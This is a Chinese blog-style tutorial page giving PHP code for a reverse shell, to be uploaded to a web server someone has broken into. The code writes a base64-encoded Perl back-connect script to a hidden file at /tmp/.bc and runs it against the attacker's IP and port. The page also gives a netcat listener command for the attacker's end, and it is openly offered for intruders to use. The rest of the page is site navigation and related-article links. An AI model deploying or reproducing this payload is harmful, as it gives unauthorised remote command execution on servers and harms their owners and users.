首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

php反弹shell实现代码

Posted in PHP onApril 22, 2009

非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。
因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpspy2008里面提取的,但是不能直接用,需要修改成一个单独的php文件。上传之后,本地监听一个端 口,在代码里设置好反弹IP和端口,然后直接访问,就会弹回来一个shell。
声明,没啥技术含量,主要是用来方便。这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码 

<?php 
function which($pr) { 
$path = execute("which $pr"); 
return ($path ? $path : $pr); 
} 
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 
function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 
$yourip = "your IP"; 
$yourport = 'your port'; 
$usedb = array('perl'=>'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

先在本地执行 nc -l -vv -p port 然后访问这个php页面 http://www.site.com/fuck.php 本地就会得到一个反弹的shell。
仅限猥琐流使用,如果有什么好的猥琐的方法,请不吝赐教

php反弹shell实现代码

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
php实现数组筛选奇数和偶数示例
Apr 11 PHP
php安装swoole扩展的方法
Mar 19 PHP
php实现插入数组但不影响原有顺序的方法
Mar 27 PHP
phpMyAdmin安装并配置允许空密码登录
Jul 04 PHP
PHP中的表达式简述
May 29 PHP
php版微信返回用户text输入的方法
Nov 14 PHP
PHP/ThinkPHP实现批量打包下载文件的方法示例
Jul 31 PHP
PHP实现求连续子数组最大和问题2种解决方法
Dec 26 PHP
php函数式编程简单示例
Aug 08 PHP
laravel框架查询数据集转为数组的两种方法
Oct 10 PHP
Laravel框架基础语法与知识点整理【模板变量、输出、include引入子视图等】
Dec 03 PHP
PHP使用QR Code生成二维码实例
Jul 07 PHP
将数组写入txt文件 var_export
Apr 21 #PHP
php 保留小数点
Apr 21 #PHP
PHP 中执行排序与 MySQL 中排序
Apr 21 #PHP
一个php导出oracle库的php代码
Apr 20 #PHP
php一句话cmdshell新型 (非一句话木马)
Apr 18 #PHP
对squid中refresh_pattern的一些理解和建议
Apr 17 #PHP
PHP 加密与解密的斗争
Apr 17 #PHP
晶体管(2) 耳机(1) MOTOROLA(1) 春雷3P7(1) BOSE(2) 收信机(3) ICF-2010(1) 音箱(1) 77A(2) 单管机(1)
You might like
利用PHP命令行模式采集股票趋势信息
2016/08/09 PHP
浅谈php使用curl模拟多线程发送请求
2019/03/08 PHP
解决laravel5中auth用户登录其他页面获取不到登录信息的问题
2019/10/08 PHP
baidu博客的编辑友情链接的新的层窗口!经典~支持【FF】
2007/02/09 Javascript
JavaScript的document对象和window对象详解
2010/12/30 Javascript
Js实现手机发送验证码时按钮延迟操作
2014/06/20 Javascript
AngularJS directive返回对象属性详解
2016/03/28 Javascript
javascript 中Cookie读、写与删除操作
2017/03/29 Javascript
vue+vuecli+webpack中使用mockjs模拟后端数据的示例
2017/10/24 Javascript
jquery学习笔记之无new构建详解
2017/12/07 jQuery
微信小程序实现图片压缩功能
2018/01/26 Javascript
原生JS实现网页手机音乐播放器 歌词同步播放的示例
2018/02/02 Javascript
vue-cli3 项目从搭建优化到docker部署的方法
2019/01/28 Javascript
解决vue打包后vendor.js文件过大问题
2019/07/03 Javascript
关于angular浏览器兼容性问题的解决方案
2020/07/26 Javascript
JavaScript实现简单动态表格
2020/12/02 Javascript
[44:09]DOTA2上海特级锦标赛A组小组赛#1 EHOME VS MVP.Phx第二局
2016/02/25 DOTA
Python OpenCV 直方图的计算与显示的方法示例
2018/02/08 Python
15行Python代码带你轻松理解令牌桶算法
2018/03/21 Python
python中报错&quot;json.decoder.JSONDecodeError: Expecting value:&quot;的解决
2019/04/29 Python
Win10+GPU版Pytorch1.1安装的安装步骤
2019/09/27 Python
详解pycharm连接不上mysql数据库的解决办法
2020/01/10 Python
最新pycharm安装教程
2020/11/18 Python
pycharm中leetcode插件使用图文详解
2020/12/07 Python
公司清洁工岗位职责
2013/12/14 职场文书
《走一步再走一步》教学反思
2014/02/15 职场文书
幼儿园小班评语
2014/04/18 职场文书
庆祝国庆节演讲稿2014
2014/09/19 职场文书
关于对大人不礼貌的检讨书
2014/09/29 职场文书
车间安全生产管理制度
2015/08/06 职场文书
2015年挂职锻炼个人总结
2015/10/22 职场文书
Python还能这么玩之用Python做个小游戏的外挂
2021/06/04 Python
python 对图片进行简单的处理
2021/06/23 Python
详解TypeScript的基础类型
2022/02/18 Javascript
拙作再改《我的收音机情缘》
2022/04/05 无线电
讨论nginx location 顺序问题
2022/05/30 Servers